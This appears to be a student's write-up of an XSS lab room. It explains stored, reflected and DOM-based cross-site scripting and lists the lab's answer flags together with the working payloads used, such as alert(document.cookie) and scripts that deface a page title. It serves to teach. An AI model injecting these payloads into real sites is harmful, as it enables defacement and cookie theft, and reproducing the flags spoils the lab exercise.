Cross-Site Scripting

Date: 01, January, 2021

Author: Dhilip Sanjay S

XSS

XSS a type of injection which can allow an attacker to execute malicious scripts and have it execute on a victim’s machine.
A web app is vulnerable to XSS if it uses unsanitized user input.
XSS is possible in :
- Javascript
- VBscript
- Flash
- CSS
Three types of XSS:
- Stored XSS- Malicious string originates from the website's database. This happens when attacker is able to insert a malicious code into the database.
- Reflected XSS- MAlicious payload is part of victims request to the website. The attacker need to trick a victim into clicking a URL to execute their malicious payload
- DOM-based XSS- DOM (Document Object Model) is a programming interface for HTML and XML document. It can change the document (refers to web page) structure, style and content.

XSS Payloads

Popups - <script>alert(“Hello World”)</script>
Writing HTML (defacing the entire page)
XSS Key logger
Port Scanning
For more payloads:
- XSS Payloads.com

Solutions

Answer: ThereIsMoreToXSSThanYouThink
Steps to Reproduce:
```
<script>alert(Hello)</script>
```

Answer: ReflectiveXss4TheWin

Steps to Reproduce:

<script>alert(window.location.hash)</script>

"Stored XSS" tab - Add a comment and see if you can insert some of your own HTML.

Answer: HTML_T4gs
Steps to Reproduce: <h1>Hello</h1>

Answer: W3LL_D0N3_LVL2s
Steps to Reproduce:
```
<script>alert(document.cookie)</script>
```

Change "XSS Playground" to "I am a hacker" by adding a comment and using Javascript.

Answer: websites_can_be_easily_defaced_with_xss

Steps to Reproduce:

<script>document.getElementById("thm-title").innerText = "I am a hacker"</script>

<script>document.querySelector("#thm-title").textContent = 'I am a hacker'</script>

PreviousSecurity Misconfiguration NextInsecure Deserialization

Last updated 3 months ago